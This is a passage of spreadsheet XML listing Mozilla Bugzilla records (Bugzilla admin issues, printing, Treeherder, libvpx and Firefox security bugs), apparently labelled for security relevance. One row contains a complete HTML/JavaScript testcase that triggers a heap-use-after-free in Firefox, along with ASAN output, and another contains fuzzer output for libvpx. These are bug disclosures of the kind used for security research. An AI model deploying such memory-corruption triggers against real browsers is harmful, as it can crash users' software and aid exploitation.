        </is>
      </c>
      <c r="T998" t="n">
        <v>1</v>
      </c>
      <c r="U998" t="n">
        <v>0</v>
      </c>
      <c r="V998" t="n">
        <v>3</v>
      </c>
      <c r="W998" t="inlineStr">
        <is>
          <t>from :lars description in IRC: 
MigrationCrashStorage is a class for crashes with a threshold date.  Anything before the threhold automatically saves/fetches us-west, after the threshold it uses us-east.  since crash_ids have the date encoded in the last 6 characters, dispatch would be trivial.
This would primarily be helpful in a transition from one AWS region to another.  We might also consider it for other crash storage migrations.</t>
        </is>
      </c>
      <c r="X998" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="999">
      <c r="A999" t="n">
        <v>227513</v>
      </c>
      <c r="B999" t="inlineStr">
        <is>
          <t>2003-12-04 14:15:38 -0800</t>
        </is>
      </c>
      <c r="C999" t="inlineStr">
        <is>
          <t>default privileges granted to default bugs user aren't enough for creation of shadowdb</t>
        </is>
      </c>
      <c r="D999" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:38 -0800</t>
        </is>
      </c>
      <c r="E999" t="n">
        <v>1</v>
      </c>
      <c r="F999" t="n">
        <v>1</v>
      </c>
      <c r="G999" t="n">
        <v>4</v>
      </c>
      <c r="H999" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I999" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J999" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K999" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L999" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M999" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N999" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O999" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P999" t="inlineStr">
        <is>
          <t>[fixed in 2.16.5] [does not affect trunk]</t>
        </is>
      </c>
      <c r="Q999" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R999" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S999" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T999" t="n">
        <v>1</v>
      </c>
      <c r="U999" t="n">
        <v>0</v>
      </c>
      <c r="V999" t="n">
        <v>7</v>
      </c>
      <c r="W999" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020920 Netscape/7.0
Build Identifier: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020920 Netscape/7.0
When I change the bugzilla parameters to create the shadowdb (after I've
fixed the 'tainted value' bug), the privileges I granted the bugs user as
per the install instructions:
GRANT SELECT,INSERT,UPDATE,DELETE,INDEX, ALTER,CREATE,DROP,REFERENCES ON bugs.*
TO bugs@localhost IDENTIFIED BY '&lt;bugs_password&gt;';
Aren't adequate to create the new shadowdb  
Reproducible: Always
Steps to Reproduce:
1. Install bugzilla on Solaris 9 using the perl in /usr/perl5
(v5.6.1 built for sun4-solaris-64int)
2.Fix bug #227510
3. Log in as the bugzilla administrator
4.Select edit parameters link
5. Enter a name for the shadowdb
6. Turn "queryagainstshadowdb" on
7. Select "submit changes"
8. Reauthenticate as administrator
Actual Results:  
Get this error message:
Saving new parameters
DBD::mysql::st execute failed: Access denied for user: 'bugs@localhost' to
database 'backupbugs' at globals.pl line 271. [Thu Dec 4 14:03:06 2003]
doeditparams.cgi: DBD::mysql::st execute failed: Access denied for user:
'bugs@localhost' to database 'backupbugs' at globals.pl line 271. Content-type:
text/html
Software error:
CREATE DATABASE backupbugs: Access denied for user: 'bugs@localhost' to database
'backupbugs' at globals.pl line 276.
For help, please send mail to this site's webmaster, giving this error message
and the time and date of the error. [Thu Dec 4 14:03:06 2003] doeditparams.cgi:
CREATE DATABASE backupbugs: Access denied for user: 'bugs@localhost' to database
'backupbugs' at globals.pl line 276. 
Expected Results:  
Create the shadowdb</t>
        </is>
      </c>
      <c r="X999" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" t="n">
        <v>99415</v>
      </c>
      <c r="B1000" t="inlineStr">
        <is>
          <t>2001-09-12 17:51:17 -0700</t>
        </is>
      </c>
      <c r="C1000" t="inlineStr">
        <is>
          <t>[FIX]Need better configurability of headers/footers</t>
        </is>
      </c>
      <c r="D1000" t="inlineStr">
        <is>
          <t>2002-01-27 17:33:08 -0800</t>
        </is>
      </c>
      <c r="E1000" t="n">
        <v>1</v>
      </c>
      <c r="F1000" t="n">
        <v>1</v>
      </c>
      <c r="G1000" t="n">
        <v>3</v>
      </c>
      <c r="H1000" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1000" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1000" t="inlineStr">
        <is>
          <t>Printing: Output</t>
        </is>
      </c>
      <c r="K1000" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1000" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1000" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N1000" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1000" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1000" t="inlineStr">
        <is>
          <t>[from bugscape] PDT+</t>
        </is>
      </c>
      <c r="Q1000" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1000" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1000" t="inlineStr">
        <is>
          <t>mozilla0.9.5</t>
        </is>
      </c>
      <c r="T1000" t="n">
        <v>1</v>
      </c>
      <c r="U1000" t="n">
        <v>0</v>
      </c>
      <c r="V1000" t="n">
        <v>23</v>
      </c>
      <c r="W1000" t="inlineStr">
        <is>
          <t>We need to to be able to be able to more easily tailor where the title, doc URL, 
date-time and page numbers are placed.
We can do this by enabling the print options to have 6 six strings
Left, Center, Right for the header
Left, Center, Right for the footer
Then we can indicate what goes where by using the following varibales that will 
be substituted:
&amp;T - title
&amp;U - Document URL
&amp;D - Date/Time
&amp;p - Page Number
&amp;P - total Number of pages
(The patch will soon follow, I have it in my tree)</t>
        </is>
      </c>
      <c r="X1000" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" t="n">
        <v>662948</v>
      </c>
      <c r="B1001" t="inlineStr">
        <is>
          <t>2011-06-08 15:25:09 -0700</t>
        </is>
      </c>
      <c r="C1001" t="inlineStr">
        <is>
          <t>Create an admin panel to configure groups, profiles and fields</t>
        </is>
      </c>
      <c r="D1001" t="inlineStr">
        <is>
          <t>2012-05-09 15:54:56 -0700</t>
        </is>
      </c>
      <c r="E1001" t="n">
        <v>1</v>
      </c>
      <c r="F1001" t="n">
        <v>1</v>
      </c>
      <c r="G1001" t="n">
        <v>5</v>
      </c>
      <c r="H1001" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1001" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J1001" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K1001" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1001" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1001" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1001" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1001" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1001" t="inlineStr"/>
      <c r="Q1001" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1001" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1001" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1001" t="n">
        <v>1</v>
      </c>
      <c r="U1001" t="n">
        <v>0</v>
      </c>
      <c r="V1001" t="n">
        <v>12</v>
      </c>
      <c r="W1001" t="inlineStr">
        <is>
          <t>There's a possibility where spam user profiles may be created and need to be disabled. It'd be great to have an admin panel on the Django app to disable specific user profiles (not deleted).</t>
        </is>
      </c>
      <c r="X1001" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" t="n">
        <v>1224369</v>
      </c>
      <c r="B1002" t="inlineStr">
        <is>
          <t>2015-11-12 14:47:14 -0800</t>
        </is>
      </c>
      <c r="C1002" t="inlineStr">
        <is>
          <t>UBSan: index out of bounds [@vp8_loop_filter_row_normal]</t>
        </is>
      </c>
      <c r="D1002" t="inlineStr">
        <is>
          <t>2016-07-02 11:35:52 -0700</t>
        </is>
      </c>
      <c r="E1002" t="n">
        <v>1</v>
      </c>
      <c r="F1002" t="n">
        <v>1</v>
      </c>
      <c r="G1002" t="n">
        <v>3</v>
      </c>
      <c r="H1002" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1002" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1002" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K1002" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1002" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1002" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1002" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1002" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1002" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1002" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1002" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1002" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T1002" t="n">
        <v>1</v>
      </c>
      <c r="U1002" t="n">
        <v>0</v>
      </c>
      <c r="V1002" t="n">
        <v>8</v>
      </c>
      <c r="W1002" t="inlineStr">
        <is>
          <t>Created attachment 8686826
test_case.vp8
This was found by fuzzing libvpx (commit c6641709a707ccb98cbdf785428659e44d4f2c8b) and it appears to be in our branch.
https://dxr.mozilla.org/mozilla-central/source/media/libvpx/vp8/common/loopfilter.c#222
vp8/common/vp8_loopfilter.c:222:35: runtime error: index 225 out of bounds for type 'unsigned char [64]'
    #0 0x77cca4 in vp8_loop_filter_row_normal (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x77cca4)
    #1 0x83f283 in decode_mb_rows (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x83f283)
    #2 0x837e2d in vp8_decode_frame (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x837e2d)
    #3 0x5d052d in vp8dx_receive_compressed_data (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x5d052d)
    #4 0x5ca52c in vp8_decode (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x5ca52c)
    #5 0x4ecdde in vpx_codec_decode (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x4ecdde)
    #6 0x4eb189 in main /home/user/code/libvpx/examples/simple_decoder.c:135:11
    #7 0x7f121a2a5ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
    #8 0x41dad5 in _start (/home/user/Desktop/libvpx/simple_decoder_ub_asan+0x41dad5)</t>
        </is>
      </c>
      <c r="X1002" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" t="n">
        <v>744480</v>
      </c>
      <c r="B1003" t="inlineStr">
        <is>
          <t>2012-04-11 10:54:53 -0700</t>
        </is>
      </c>
      <c r="C1003" t="inlineStr">
        <is>
          <t>cairo_dwrite_font_face Memory Corruption Vulnerability [V-49y00m3lf2]</t>
        </is>
      </c>
      <c r="D1003" t="inlineStr">
        <is>
          <t>2012-07-12 08:46:26 -0700</t>
        </is>
      </c>
      <c r="E1003" t="n">
        <v>1</v>
      </c>
      <c r="F1003" t="n">
        <v>1</v>
      </c>
      <c r="G1003" t="n">
        <v>3</v>
      </c>
      <c r="H1003" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1003" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1003" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1003" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1003" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1003" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1003" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1003" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1003" t="inlineStr">
        <is>
          <t>[sg:critical][qa+]</t>
        </is>
      </c>
      <c r="Q1003" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1003" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1003" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T1003" t="n">
        <v>1</v>
      </c>
      <c r="U1003" t="n">
        <v>0</v>
      </c>
      <c r="V1003" t="n">
        <v>18</v>
      </c>
      <c r="W1003" t="inlineStr">
        <is>
          <t>iDefense VCP Submission V-49y00m3lf2
04/11/2012
Mozilla Firefox cairo_dwrite_font_face Memory Corruption Vulnerability (iDefense Exclusive)
Description: 
Analysis: 
Credit: 
wushi of team509</t>
        </is>
      </c>
      <c r="X1003" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" t="n">
        <v>380012</v>
      </c>
      <c r="B1004" t="inlineStr">
        <is>
          <t>2007-05-07 18:14:06 -0700</t>
        </is>
      </c>
      <c r="C1004" t="inlineStr">
        <is>
          <t>[FIX]Assertions and hang with :first-line</t>
        </is>
      </c>
      <c r="D1004" t="inlineStr">
        <is>
          <t>2008-05-08 14:14:22 -0700</t>
        </is>
      </c>
      <c r="E1004" t="n">
        <v>1</v>
      </c>
      <c r="F1004" t="n">
        <v>1</v>
      </c>
      <c r="G1004" t="n">
        <v>3</v>
      </c>
      <c r="H1004" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1004" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1004" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1004" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1004" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1004" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1004" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1004" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1004" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1004" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1004" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1004" t="inlineStr">
        <is>
          <t>mozilla1.9beta1</t>
        </is>
      </c>
      <c r="T1004" t="n">
        <v>1</v>
      </c>
      <c r="U1004" t="n">
        <v>0</v>
      </c>
      <c r="V1004" t="n">
        <v>17</v>
      </c>
      <c r="W1004" t="inlineStr">
        <is>
          <t>Created attachment 264070
Hangs Firefox when loaded, about 50% of the time
###!!! ASSERTION: unknown out of flow frame type: 'disp-&gt;mDisplay == NS_STYLE_DISPLAY_POPUP', layout/generic/nsHTMLReflowState.cpp, line 425
###!!! ASSERTION: not a floated frame: 'aChildFrame-&gt;GetStyleDisplay()-&gt;IsFloating()', layout/base/nsCSSFrameConstructor.cpp, line 1753
###!!! ASSERTION: not in child list: 'found', layout/base/nsCSSFrameConstructor.cpp, line 1777
###!!! ASSERTION: Creating a circular frame list, this is very bad.: 'this != aNextSibling', layout/base/../generic/nsIFrame.h, line 750
###!!! ASSERTION: loop in frame list.  This will probably hang soon.: 'Error', layout/generic/nsFrameList.cpp, line 580
Before reducing, I was getting sg:critical crashes about 10% of the time.
Perhaps another regression from bug 372550?</t>
        </is>
      </c>
      <c r="X1004" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" t="n">
        <v>1514668</v>
      </c>
      <c r="B1005" t="inlineStr">
        <is>
          <t>2018-12-16 23:17:59 -0800</t>
        </is>
      </c>
      <c r="C1005" t="inlineStr">
        <is>
          <t>Add the standardized LogoMenu to IFV navbar</t>
        </is>
      </c>
      <c r="D1005" t="inlineStr">
        <is>
          <t>2021-12-05 14:47:40 -0800</t>
        </is>
      </c>
      <c r="E1005" t="n">
        <v>1</v>
      </c>
      <c r="F1005" t="n">
        <v>1</v>
      </c>
      <c r="G1005" t="n">
        <v>7</v>
      </c>
      <c r="H1005" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1005" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1005" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1005" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1005" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1005" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1005" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1005" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1005" t="inlineStr"/>
      <c r="Q1005" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1005" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1005" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1005" t="n">
        <v>1</v>
      </c>
      <c r="U1005" t="n">
        <v>0</v>
      </c>
      <c r="V1005" t="n">
        <v>10</v>
      </c>
      <c r="W1005" t="inlineStr">
        <is>
          <t>Right now IFV has no way to get back to Treeherder-proper (or perfherder). There's already LogoMenu, let's use that here.</t>
        </is>
      </c>
      <c r="X1005" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" t="n">
        <v>519835</v>
      </c>
      <c r="B1006" t="inlineStr">
        <is>
          <t>2009-09-30 15:18:03 -0700</t>
        </is>
      </c>
      <c r="C1006" t="inlineStr">
        <is>
          <t>Bugzilla::Product::check_product() should be Bugzilla::Product-&gt;check()</t>
        </is>
      </c>
      <c r="D1006" t="inlineStr">
        <is>
          <t>2010-10-21 18:45:49 -0700</t>
        </is>
      </c>
      <c r="E1006" t="n">
        <v>1</v>
      </c>
      <c r="F1006" t="n">
        <v>1</v>
      </c>
      <c r="G1006" t="n">
        <v>4</v>
      </c>
      <c r="H1006" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1006" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1006" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1006" t="inlineStr">
        <is>
          <t>3.5</t>
        </is>
      </c>
      <c r="L1006" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1006" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1006" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1006" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1006" t="inlineStr"/>
      <c r="Q1006" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1006" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1006" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T1006" t="n">
        <v>1</v>
      </c>
      <c r="U1006" t="n">
        <v>0</v>
      </c>
      <c r="V1006" t="n">
        <v>8</v>
      </c>
      <c r="W1006" t="inlineStr">
        <is>
          <t>check_product() in Product.pm existed before Object.pm. We should now replace it by Object-&gt;check().</t>
        </is>
      </c>
      <c r="X1006" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" t="n">
        <v>139930</v>
      </c>
      <c r="B1007" t="inlineStr">
        <is>
          <t>2002-04-24 17:52:33 -0700</t>
        </is>
      </c>
      <c r="C1007" t="inlineStr">
        <is>
          <t>checksetup.pl fails if data/params doesn't exist</t>
        </is>
      </c>
      <c r="D1007" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E1007" t="n">
        <v>1</v>
      </c>
      <c r="F1007" t="n">
        <v>1</v>
      </c>
      <c r="G1007" t="n">
        <v>4</v>
      </c>
      <c r="H1007" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1007" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1007" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K1007" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L1007" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1007" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1007" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1007" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1007" t="inlineStr"/>
      <c r="Q1007" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1007" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1007" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1007" t="n">
        <v>1</v>
      </c>
      <c r="U1007" t="n">
        <v>0</v>
      </c>
      <c r="V1007" t="n">
        <v>18</v>
      </c>
      <c r="W1007" t="inlineStr">
        <is>
          <t>Bug 126571 went in, but that requries data/parmas without checking that it
exists.  that block should be wrapped in an |if (-e 'data/params')| check
Note that if it does exist, the graphviz check will have brought it in earlier.
Thats a separate very minor optimisation issue, though
2.16 blocker, since we do want new installations to work</t>
        </is>
      </c>
      <c r="X1007" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" t="n">
        <v>1412252</v>
      </c>
      <c r="B1008" t="inlineStr">
        <is>
          <t>2017-10-27 03:05:50 -0700</t>
        </is>
      </c>
      <c r="C1008" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsComputedDOMStyle::UpdateCurrentStyleSources</t>
        </is>
      </c>
      <c r="D1008" t="inlineStr">
        <is>
          <t>2024-05-30 09:37:46 -0700</t>
        </is>
      </c>
      <c r="E1008" t="n">
        <v>1</v>
      </c>
      <c r="F1008" t="n">
        <v>1</v>
      </c>
      <c r="G1008" t="n">
        <v>3</v>
      </c>
      <c r="H1008" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1008" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1008" t="inlineStr">
        <is>
          <t>DOM: CSS Object Model</t>
        </is>
      </c>
      <c r="K1008" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L1008" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1008" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1008" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1008" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1008" t="inlineStr">
        <is>
          <t>[adv-main57+][adv-esr52.5+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1008" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1008" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1008" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T1008" t="n">
        <v>1</v>
      </c>
      <c r="U1008" t="n">
        <v>0</v>
      </c>
      <c r="V1008" t="n">
        <v>26</v>
      </c>
      <c r="W1008" t="inlineStr">
        <is>
          <t>Created attachment 8922727
crash.html
The following testcase crashes the latest ASAN build of Firefox (BuildID=20171026221048)
crash.html:
&lt;script&gt;
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    x.send("X");
}
function start() {
	o1=window.open('x','p6','height=0');
	o3=document.documentElement;
	o7=document.createElement('marquee');
	o3.addEventListener('DOMAttrModified',fun0);
	o3.appendChild(o7);
	o1.getComputedStyle(o3).color;
}
function fun0() {
	spin();
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==10774==ERROR: AddressSanitizer: heap-use-after-free on address 0x62200003f110 at pc 0x7f067e63da87 bp 0x7fff53791690 sp 0x7fff53791688
READ of size 8 at 0x62200003f110 thread T0 (file:// Content)
    #0 0x7f067e63da86 in get /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:287:27
    #1 0x7f067e63da86 in operator nsPresContext * /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:300
    #2 0x7f067e63da86 in GetPresContext /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:254
    #3 0x7f067e63da86 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:978
    #4 0x7f067e63e161 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:1165:3
    #5 0x7f067e63bd48 in nsComputedDOMStyle::GetPropertyValue(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt;&amp;) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:479:26
    #6 0x7f067e63bb58 in nsComputedDOMStyle::GetPropertyValue(nsCSSPropertyID, nsTSubstring&lt;char16_t&gt;&amp;) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:415:10
    #7 0x7f067aba3396 in GetColor /builds/worker/workspace/build/src/layout/style/nsCSSPropList.h:1439:1
    #8 0x7f067aba3396 in mozilla::dom::CSS2PropertiesBinding::get_color(JSContext*, JS::Handle&lt;JSObject*&gt;, nsDOMCSSDeclaration*, JSJitGetterCallArgs) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:12880
    #9 0x7f067c34b156 in mozilla::dom::GenericBindingGetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2909:13
    #10 0x7f06829577f0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #11 0x7f06829577f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #12 0x7f06829597c5 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #13 0x7f06829597c5 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541
    #14 0x7f06829597c5 in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:656
    #15 0x7f06838ea68c in CallGetter /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2119:16
    #16 0x7f06838ea68c in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2172
    #17 0x7f06838ea68c in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2375
    #18 0x7f06838ea68c in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2411
    #19 0x7f068339776c in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1601:12
    #20 0x7f068339776c in JS_ForwardGetPropertyTo(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2707
